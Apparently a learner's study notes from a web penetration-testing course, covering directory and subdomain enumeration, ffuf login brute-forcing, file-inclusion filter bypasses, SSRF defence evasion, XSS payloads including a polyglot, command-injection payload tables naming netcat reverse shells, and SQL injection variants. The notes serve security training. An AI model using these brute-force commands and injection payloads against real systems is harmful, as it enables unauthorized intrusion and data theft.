Content Discovery
OSINT
| Filter | Description |
|---|---|
| site: | only results with specified website address |
| inurl: | results with specified word in url |
| filetype: | results with particular file extension |
| intitle: | results that contain word in title |
Wappalyzer
- helps identify what technologies a website uses
- frameworks
- cms
- payment processors
- …
Automated Discovery
Wordlists
ffuf
ffuf -w <path to wordlist> -u <target site>
dirb
dirb <target site> <path to wordlist>
Gobuster
gobuster dir --url <target site> -w <path to wordlist>
Subdomain Enumeration
SSL/TLS Certificates
DNS Bruteforce
dnsrecon -t <type of scan> -d <target domain> -D <path to hostnames>
https://github.com/darkoperator/dnsrecon
Sublist3r
./sublist3r.py -d <target domain>
https://github.com/aboul3la/Sublist3r
Virtual Hosts - ffuf
ffuf -w <path to wordlist> -H "Host: FUZZ.<target domain (host header)>" -u https://<machine ip>
Authentication Bypass
Username Enumeration
ffuf
try list of words against login form
ffuf -w <path to wordlist> \
-X POST \
-d "username=FUZZ&email=x&password=x&cpassword=x" \
-H "Content-Type: application/x-www-form-urlencoded" \
-u <target url with path to form> -mr "username already exists"
Brute Force
ffuf -w <path to wordlist with found usernames>:W1,<path to password wordlist>:W2 \
-X POST -d "username=W1&password=W2" \
-H "Content-Type: application/x-www-form-urlencoded" \
-u <target url with path to form> -fc 200
Cookie Tampering
IDOR - Insecure Direct Object Reference
File Inclusion
Path Traversal
trying to climb out of directories using dot-dot-slash attack
Local File Inclusion
- directory specified inside function
<?PHP include($_GET["lang"]); ?>- lang can be replaced with direct path to files
<?PHP include("languages/". $_GET['lang']); ?>- need to use relative path to get to files
Bypassing Filters in Include Function
- getting around specified file endings
- use
%00(NULL BYTE), terminating the string - fixed in php 5.3.4
- use
- avoiding filtered keywoards
- use
/.at the end of the filtered keyword
- use
- bypassing input validation
- getting around
../being replaced with an empty string - using
....//instead- php replaces
.. ../ /with `` and../stays
- php replaces
- getting around
- reading outside of a defined directory
- include directory in payload
Remote File Inclusion
Calling a file from a remote server to be included in the web app. Which will execute the PHP code.
SSRF
Finding SSRF
- full url used as parameter in address bar
- hidden field in a form
- partial url like a hostname
- path of a url
Use https://requestbin.com to catch HTTP requests from a server
Defeating Common SSRF Defenses
- Deny List
- using alternative localhost references
- or subdomain that has a DNS record which resolves to ip 127.0.0.1 or 127.0.0.1.nip.io
- Allow List
- creating subdomain on attackers domain name
- e.g.
website.thm–>website.thm.attack.thm
- Open Redirect
- endpoint on the server where service gets redirected
Cross-site Scripting
Reflected XSS
Reflected XSS happens when user-supplied data in an HTTP request is included in the webpage source without any validation.
- testing for reflected xss
- parameters in url query string
- url file path
- sometimes http headers (unlikely exploitable)
Stored XSS
As the name infers, the XSS payload is stored on the web application (in a database, for example) and then gets run when other users visit the site or web page.
- testing for stored xss
- every possible point of entry where it seems data is stored and then shown back, that other users have access to
- comments on a blog
- user profile information
- website listings
- every possible point of entry where it seems data is stored and then shown back, that other users have access to
DOM (Document Object Model) Based XSS
DOM Based XSS is where the JavaScript execution happens directly in the browser without any new pages being loaded or data submitted to backend code. Execution occurs when the website JavaScript code acts on input or user interaction.
- testing for DOM based xss
- look for parameters like
window.location.x eval()in JS
- look for parameters like
Blind XSS
Blind XSS is similar to a stored XSS in that your payload gets stored on the website for another user to view, but in this instance, you can’t see the payload working or be able to test it against yourself first.
- testing for blind xss
- XSS Hunter Express https://github.com/mandatoryprogrammer/xsshunter-express
- need to make sure payload has callback to see if it worked
“Perfecting Your Payload”
- simple heading output field
<script>alert('THM');</script>
- value in input field
"><script>alert('THM');</script>- closing value parameter and input tag
- input in textarea
</textarea><script>alert('THM');</script>- closing textarea and adding script
- input being reflected in JS code
';alert('THM');//- escape existing JS command
- closing field specifying the variable
- end of current command
- code after is a comment
- filter that removes script from input
<sscriptcript>alert('THM');</sscriptcript>- script gets removed but
s criptstays forming new script
- image tag as input
/images/cat.jpg" onload="alert('THM');
- polyglot / xss polyglot
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */onerror = alert('THM'))//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert('THM')//>\x3e
Command Injection - Remote Code Execution
Exploiting Command Injection
- types of command injection
- blind
- This type of injection is where there is no direct output from the application when testing payloads. You will have to investigate the behaviours of the application to determine whether or not your payload was successful.
- verbose
- This type of injection is where there is direct feedback from the application once you have tested a payload. For example, running the whoami command to see what user the application is running under. The web application will output the username on the page directly.
- blind
Detecting Blind Command Injection
- no output visible
- need to use payloads that will cause come delay
pingorsleep
- or force some output
- redirection operators like
>
- redirection operators like
curlgood way to test- delivering data to and from application in payload
Detecting Verbose Command Injection
- application gives direct feedback on output
Useful payloads
Linux
| payload | description |
|---|---|
| whoami | See what user the application is running under. |
| ls | List the contents of the current directory. You may be able to find files such as configuration files, environment files (tokens and application keys), and many more valuable things. |
| ping | This command will invoke the application to hang. This will be useful in testing an application for blind command injection. |
| sleep | This is another useful payload in testing an application for blind command injection, where the machine does not have ping installed. |
| nc | Netcat can be used to spawn a reverse shell onto the vulnerable application. You can use this foothold to navigate around the target machine for other services, files, or potential means of escalating privileges. |
Windows
| payload | description |
|---|---|
| whoami | See what user the application is running under. |
| dir | List the contents of the current directory. You may be able to find files such as configuration files, environment files (tokens and application keys), and many more valuable things. |
| ping | This command will invoke the application to hang. This will be useful in testing an application for blind command injection. |
| timeout | This command will also invoke the application to hang. It is also useful for testing an application for blind command injection if the ping command is not installed. |
Cheat Sheet
https://github.com/payloadbox/command-injection-payload-list
SQL Injection
In Band SQLi
communication being used to exploit the vulnerability and also receive the results
- error based
- most useful for easily obtaining information about database structure
- union based
- uses sql
unionoperator alongsideselectto return addition resultss - used to extract large amounts of data
- uses sql
Blind SQLi - Authentication Bypass
error messages have been disabled, but injection still works
- example
- using query that always returns true
OR 1=1;--
- using query that always returns true
Blind SQLi - Boolean Based
injection with only two possible responses
- example username choice
- extending query with queries
... column_name LIKE '%'- trying all possible combinations, e.g.
a%,b%…
- trying all possible combinations, e.g.
Blind SQLi - Time Based
same as boolean based, except no feedback if query is good, only response time available as measurement
- example
admin123' UNION SELECT SLEEP(5);--- no pause = unsuccessful
admin123' UNION SELECT SLEEP(5),2;--- pause = successful
Out Of Band SQLi
An Out-Of-Band attack is classified by having two different communication channels, one to launch the attack and the other to gather the results. For example, the attack channel could be a web request, and the data gathering channel could be monitoring HTTP/DNS requests made to a service you control.